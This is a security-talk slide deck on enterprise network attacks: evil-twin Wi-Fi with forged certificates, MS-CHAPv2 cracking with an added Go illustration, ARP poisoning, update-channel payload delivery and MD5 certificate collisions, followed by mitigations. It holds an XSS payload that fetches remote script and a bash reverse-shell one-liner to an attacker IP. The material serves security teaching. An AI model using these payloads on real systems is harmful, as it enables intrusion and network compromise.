Post on 13-Apr-2017
Enterprise Network Security
Navneet Kumar
Overview
• Demo
• OSI Protocols Overview
• Evil Twin Attack
• Cryptanalysis: MS-CHAPv2
• ARP poisoning
• POST-MITM Attack vectors
• Reverse Shell
• Mitigations
• Certificate Collision Attack
Note: Some images in this presentation have been taken from the web for illustration
SilverFish Worm: XSS → NPAPI runtime → Shell
XSS: <img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')
NPAPI runtime: masterPlugin.updatePlugin("attacker-plugin", success, failure)
Shell: Netcat Shell / ssh daemon / Bonjour
Hatching rate = n^g
n = average # of endpoints per meeting
g = # of generations
[Diagram: spread of the worm across generations g = 0, g = 1, g = 2]
Target Protocols: 802.11, ARP
Attack Vectors (802.11): Evil twin attack, Fake Certificate Exchange
Attack Setup
Soft AP
• Put WNIC in Master Mode and use Forged CA cert
• Configure AP SSID to "bjn-int"
• Deauth to actual AP
Network
• Setup DNS
• Setup DHCP
Routing
• Redirect 80,443 packets to proxy port
• Forward traffic after NAT
Capture
• Use Same CA cert for signing
• Sniff in proxy
Note: Chrome uses certificate pinning for *.google.com
[Demo screenshots: wireless scan showing the fake BSSID on the highest-strength 2.4 GHz channel; the victim's client ("WTF !!!"); certificate forgery; Soft AP, DHCP, routing and proxy]
Cryptanalysis of MS-CHAPv2
ChallengeHash = SHA1(random || username)[0:8]
[Diagram: ChallengeHash → ChallengeResponse]
Note: Original complexity analysis has been done by Moxie Marlinspike
Cryptanalysis of MS-CHAPv2
NT hash split into DES keys: 7 byte | 7 byte | 2 byte
Complexity = 2^56
time < 24 hrs (100% success)
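The ChallengeHash and ChallengeResponse steps above, as an added example (not from the slides and not Marlinspike's code): a Go implementation of the RFC 2759 response computation that also returns the three DES keys, so the 7 | 7 | 2 byte split behind the 2^56 figure can be inspected directly. The NT hash is taken as input (constructed bytes), since MD4 is not in Go's standard library, and "random" in the slide's formula is expanded to the two 16-byte challenges of RFC 2759.

```go
package main

import (
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
	"math/bits"
)

// challengeHash is RFC 2759 ChallengeHash, the slide's SHA1(random || username)[0:8] (random = both challenges).
func challengeHash(peer, auth [16]byte, username string) (out [8]byte) {
	sum := sha1.Sum(append(append(peer[:], auth[:]...), username...))
	copy(out[:], sum[:8])
	return out
}

// desKey56 expands a 7-byte key to DES's 8-byte form by inserting an odd-parity bit
// after every 7 key bits (RFC 2759 DesEncrypt). Only 56 bits of the result are secret.
func desKey56(k7 [7]byte) []byte {
	v := binary.BigEndian.Uint64(append([]byte{0}, k7[:]...))
	k8 := make([]byte, 8)
	for i := range k8 {
		seven := byte(v>>uint(49-7*i)) & 0x7f
		k8[i] = seven<<1 | byte(1-bits.OnesCount8(seven)%2) // low bit = parity
	}
	return k8
}

// ntResponse is RFC 2759 ChallengeResponse: the NT hash, zero-padded to 21 bytes, is split
// into the slide's "7 byte | 7 byte | 2 byte" DES keys, each encrypting the SAME ChallengeHash,
// so keys 0 and 1 fall to one 2^56 DES search and key 2 (2 hash bytes + 5 known zeros) to 2^16.
func ntResponse(ntHash [16]byte, ch [8]byte) (resp [24]byte, keys [3][7]byte) {
	var padded [21]byte
	copy(padded[:], ntHash[:])
	for i := range keys {
		copy(keys[i][:], padded[7*i:7*i+7])
		c, _ := des.NewCipher(desKey56(keys[i])) // only errors on a bad key length
		c.Encrypt(resp[8*i:8*i+8], ch[:])
	}
	return resp, keys
}

func main() { // constructed sample values, not a captured handshake
	peer, auth := [16]byte{1, 2, 3, 4}, [16]byte{5, 6, 7, 8}
	nt := [16]byte{14: 0xbe, 15: 0xef} // only bytes 14-15 reach the third DES key
	resp, keys := ntResponse(nt, challengeHash(peer, auth, "User"))
	fmt.Printf("NT-Response %x\nkey 3 = %x (only 16 secret bits)\n", resp, keys[2])
}
```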
ARP poisoning
POST-MITM Attack Vectors
• Reverse Shell
• Bind Shell
• Session Hijacking
• Above L3 Attacks
Reverse Bind Shell
• Give a network shell to attacker
• Works Behind NAT
• Gets Root Access
HOW ????
$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1
(Auto)Updates: Deploy Payload with updates
https://tools.google.com/service/update2
https://swdl.bluejeans.com
https://aus4.mozilla.org/update/*/update.xml
smb://MVAV01/SophosUpdate
Mitigation
• Pre-deployment of enterprise wide CA
• SSL Cert Pinning for updates
• Proper WIPS Configuration
• ARP Spoof Mitigations
• Careful CA signing
Certificate Collision Attack
[Diagram: DomainA sends a CSR to the CA, which checks isCA? and issues a Certificate by signing the CSR's TBS part, E_key[Sha(csr.tbs)]. Sha(domainA.csr) and Sha(domainB.csr) differ, but md5(domainA.csr) = md5(domainB.csr), so a signature over one CSR is also valid for the other, with the isCA? flag False in one and True in the other. MD5 Collision → Certificate Collision]